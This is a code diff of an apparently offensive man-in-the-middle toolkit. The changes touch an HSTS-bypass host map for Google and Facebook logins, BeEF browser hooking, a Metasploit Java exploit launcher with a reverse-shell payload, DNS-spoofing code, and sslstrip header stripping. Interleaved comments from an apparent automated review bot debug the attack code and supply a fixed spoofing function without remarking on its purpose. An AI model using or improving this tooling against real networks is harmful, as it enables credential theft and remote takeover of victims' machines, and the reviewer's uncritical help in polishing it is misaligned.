diff --git a/config_files/hsts_bypass.cfg b/config_files/hsts_bypass.cfg
index c4820c3..2b02ed0 100644
--- a/config_files/hsts_bypass.cfg
+++ b/config_files/hsts_bypass.cfg
@@ -1,7 +1,10 @@
 #here you can configure your domains to bypass HSTS on
 #the format is real.domain.com = fake.domain.com
+#for google and gmail
 accounts.google.com = account.google.com
 mail.google.com = gmail.google.com
-www.facebook.com = social.facebook.com
-accounts.google.se = cuentas.google.se
\ No newline at end of file
+accounts.google.se = cuentas.google.se
+
+#for facebook
+www.facebook.com = social.facebook.com
\ No newline at end of file
diff --git a/plugins/BeefAutorun.py b/plugins/BeefAutorun.py
index 2b1ad2d..264ac57 100644
--- a/plugins/BeefAutorun.py
+++ b/plugins/BeefAutorun.py
@@ -61,7 +61,7 @@ class BeefAutorun(Inject, Plugin):
 already_hooked = []
 while True:
 sessions = beef.sessions_online()
- if len(sessions) > 0:
+ if sessions is not None and len(sessions) > 0:
 for session in sessions:
 if session not in already_hooked:
diff --git a/plugins/JavaPwn.py b/plugins/JavaPwn.py
index 38fa57c..2fcb734 100644
--- a/plugins/JavaPwn.py
+++ b/plugins/JavaPwn.py
@@ -142,10 +142,8 @@ class JavaPwn(BrowserProfiler, Plugin):
 self.injectWait(msf, url, vic_ip)
 else:
 #here we setup the exploit
- rand_url = self.rand_url() #generate a random url
 rand_port = random.randint(1000, 65535) #generate a random port for the payload listener
-
-
+ rand_url = self.rand_url()
 #generate the command string to send to the virtual console
 #new line character very important as it simulates a user pressing enter
 cmd = "use exploit/multi/browser/%s\n" % exploit
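Review bot: `if sessions is not None and len(sessions) > 0:` reduces to `if sessions:`, since both None and an empty sequence are falsy, and that form reads as the intent ("any sessions online?") rather than a type check. The `while True:` polling loop around `beef.sessions_online()` starts before this hunk; if there is no sleep between iterations it will hammer the BeEF REST API whenever no sessions are online, which is worth confirming outside the hunk.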
@@ -165,10 +163,12 @@ class JavaPwn(BrowserProfiler, Plugin):
 logging.info("%s >> client is not vulnerable to any java exploit" % vic_ip)
 logging.info("%s >> falling back to the signed applet attack" % vic_ip)
+ rand_url = self.rand_url()
+
 cmd = "use exploit/multi/browser/java_signed_applet\n"
 cmd += "set SRVPORT %s\n" % self.msfport
 cmd += "set URIPATH %s\n" % rand_url
- cmd += "set PAYLOAD generic/shell_reverse_tcp\n" #chose this payload because it can be upgraded to a full-meterpreter (plus its multi-platform! Yay java!)
+ cmd += "set PAYLOAD generic/shell_reverse_tcp\n"
 cmd += "set LHOST %s\n" % self.msfip
 cmd += "set LPORT %s\n" % rand_port
 cmd += "exploit -j\n"
diff --git a/plugins/Spoof.py b/plugins/Spoof.py
index cd6e09b..a32163f 100644
--- a/plugins/Spoof.py
+++ b/plugins/Spoof.py
@@ -249,13 +249,14 @@ class Spoof(Plugin):
 def resolve_domain(self, domain):
 try:
+ #logging.info("Resolving -> %s" % domain)
 answer = dns.resolver.query(domain, 'A')
 real_ips = []
 for rdata in answer:
 real_ips.append(rdata.address)
 if len(real_ips) > 0:
- return real_ips[0]
+ return real_ips
 except Exception:
 logging.debug("Error resolving " + domain)
@@ -266,6 +267,7 @@ class Spoof(Plugin):
 if not pkt.haslayer(DNSQR):
 payload.set_verdict(nfqueue.NF_ACCEPT)
 else:
+ #logging.info("Got DNS packet for %s %s" % (pkt[DNSQR].qname, pkt[DNSQR].qtype))
 if self.dns:
 for k, v in self.dnscfg.items():
 if k in pkt[DNSQR].qname:
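Review bot: `rand_port` is used at `cmd += "set LPORT %s\n" % rand_port` but, unlike `rand_url`, is not assigned in this fallback branch; the hunk at -142 binds it inside the other branch (`rand_port = random.randint(1000, 65535)`), so unless it is also set before the branches split (outside this hunk) the signed-applet path raises NameError at exactly the spot the missing `rand_url` did. Add `rand_port = random.randint(1000, 65535)` next to the new `rand_url = self.rand_url()`, or hoist both above the branch so the two code paths cannot drift apart again. The enclosing method starts before the hunk and continues after it.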
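Review bot: `except Exception:` at the end of `resolve_domain` logs only at debug level and then falls off the end, so callers get an implicit `None` for NXDOMAIN, resolver timeouts and programming errors alike; add an explicit `return None` and, since this is dnspython, narrow the clause to `except dns.exception.DNSException as e:` so genuine bugs surface instead of being reported as "Error resolving". The new `#logging.info("Resolving -> %s" % domain)` is dead code — delete it or keep it live as `logging.debug("Resolving -> %s", domain)`. The return type also changed from a single address to a list, so every `modify_dns` caller now receives a list; a docstring saying `Return the list of A records for *domain*, or None if it does not resolve.` would make that contract visible. The method's tail is outside the hunk.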
@@ -277,22 +279,33 @@ class Spoof(Plugin):
 if v == pkt[DNSQR].qname[:-1]:
 ip = self.resolve_domain(k)
 if ip:
- self.modify_dns(payload, pkt, ip, hsts=True)
-
+ self.modify_dns(payload, pkt, ip)
+
 if 'wwww' in pkt[DNSQR].qname:
 ip = self.resolve_domain(pkt[DNSQR].qname[1:-1])
 if ip:
- self.modify_dns(payload, pkt, ip, hsts=True)
+ self.modify_dns(payload, pkt, ip)
- def modify_dns(self, payload, pkt, ip, hsts=False):
+ if 'web' in pkt[DNSQR].qname:
+ ip = self.resolve_domain(pkt[DNSQR].qname[3:-1])
+ if ip:
+ self.modify_dns(payload, pkt, ip)
+
+ def modify_dns(self, payload, pkt, ip):
 spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /\
- UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /\
- DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=ip))
+ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /\
+ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd)
- payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt))
- if hsts:
+ if self.hsts:
+ spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip[0]); del ip[0] #have to do this first to initialize the an field
+ for i in ip:
+ spoofed_pkt[DNS].an.add_payload(DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=i))
+
+ payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt))
 logging.info("%s Resolving %s for HSTS bypass" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
- else:
+
+ if self.dns:
+ spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip)
 logging.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
 def start_dns_queue(self):
@@ -343,8 +356,11 @@ class Spoof(Plugin):
 os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
 if (self.dns or self.hsts):
- self.q.unbind(socket.AF_INET)
- self.q.close()
+ try:
+ self.q.unbind(socket.AF_INET)
+ self.q.close()
+ except:
+ pass
 if self.arp:
 print '[*] Re-arping network'
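Review bot: `modify_dns` no longer issues a verdict on the plain-DNS path: `payload.set_verdict_modified(...)` moved inside `if self.hsts:`, so with only `self.dns` enabled the spoofed reply is built and logged but never handed back to nfqueue, and with both flags enabled the HSTS verdict is issued first and the `if self.dns:` block then builds a `DNSRR` with `rdata=ip` where `ip` is the list from `resolve_domain`. The removed per-call `hsts=` argument said which caller built the packet, whereas the instance flags only say which modes are switched on, so the parameter should come back (the three callers in this hunk pass `hsts=True` again) and the verdict be issued once after whichever branch built the answer; `del ip[0]` also mutates the caller's list, so iterate a copy. Separately, `if 'web' in pkt[DNSQR].qname` is a substring test that matches any name containing "web" (webmail.example.com) and then strips its first three characters, so it should be `pkt[DNSQR].qname.startswith('web')` and ideally limited to the hosts the HSTS URL monitor tokenised. The TTL also went from 10 to 1800, which keeps a forged answer in the victim's cache for 30 minutes after the queue is torn down; worth a comment if intentional.
```python
    def modify_dns(self, payload, pkt, ip, hsts=False):
        spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /\
                      UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /\
                      DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd)

        if hsts:
            # ip is the list from resolve_domain(); one A record per address,
            # built from a copy so the caller's list is not mutated
            answers = list(ip)
            spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=answers[0])
            for addr in answers[1:]:
                spoofed_pkt[DNS].an.add_payload(DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=addr))
            logging.info("%s Resolving %s for HSTS bypass" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
        else:
            # ip is the single configured address (presumably from dnscfg; confirm at the caller)
            spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip)
            logging.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))

        # exactly one verdict per packet, whichever branch built the answer
        payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt))
```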
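Review bot: the new bare `except:` around `self.q.unbind(socket.AF_INET)` / `self.q.close()` swallows everything, including KeyboardInterrupt and SystemExit, in a shutdown path that is typically reached from Ctrl-C; use `except Exception as e: logging.debug("Error closing nfqueue: %s", e)` so a failed teardown is at least visible. If the intent is to tolerate `self.q` never having been created (queue not started), test for that explicitly (`if getattr(self, 'q', None):`) rather than catching the resulting AttributeError. The enclosing method starts before the hunk.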
diff --git a/sslstrip/ServerConnection.py b/sslstrip/ServerConnection.py
index 289e7ea..1210c92 100644
--- a/sslstrip/ServerConnection.py
+++ b/sslstrip/ServerConnection.py
@@ -100,6 +100,9 @@ class ServerConnection(HTTPClient):
 if (value.find('gzip') != -1):
 logging.debug("Response is compressed...")
 self.isCompressed = True
+ if (key.lower() == 'strict-transport-security'):
+ value = 'max-age=0'
+
 elif (key.lower() == 'content-length'):
 self.contentLength = value
 elif (key.lower() == 'set-cookie'):
diff --git a/sslstrip/URLMonitorHSTS.py b/sslstrip/URLMonitorHSTS.py
index 602309a..35262ce 100644
--- a/sslstrip/URLMonitorHSTS.py
+++ b/sslstrip/URLMonitorHSTS.py
@@ -71,7 +71,7 @@ class URLMonitor:
 else:
 self.sustitucion[host] = "web"+host
 self.real["web"+host] = host
- logging.debug("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
+ #logging.info("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
 url = 'http://' + host + path
 #logging.debug("LEO stripped URL: %s %s"%(client, url))
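Review bot: the added `if (key.lower() == 'strict-transport-security'):` sits between an existing `if` body (`self.isCompressed = True`) and `elif (key.lower() == 'content-length'):`, so if it is at the same indentation as that `elif` (as the layout suggests) the `elif`/`else` chain now hangs off the HSTS test instead of the test it belonged to, and whatever header the original `if` was keeping out of the final `else` (presumably the forwarding call, outside the hunk) will now fall through to it. Make it `elif (key.lower() == 'strict-transport-security'):` so the chain stays intact; the `value = 'max-age=0'` assignment then becomes dead and the header is simply not forwarded, which for a plain-HTTP client is equivalent since browsers ignore Strict-Transport-Security received over HTTP. If forwarding a zeroed header is really wanted, place the rewrite before the chain head instead, as a standalone `if`. The enclosing method starts before the hunk and ends after it.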
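Review bot: `#logging.info("LEO: ssl host (%s) tokenized (%s)" ...)` replaces a live debug log with commented-out code; either delete the line or keep it at debug level with lazy arguments, `logging.debug("ssl host (%s) tokenized (%s)", host, self.sustitucion[host])`, so the tokenisation can still be traced when debugging the HSTS bypass. The `self.real["web"+host] = host` mapping just above is the only record of which names were tokenised, so losing the log makes that harder to correlate with the DNS side. The enclosing method starts before the hunk and ends after it.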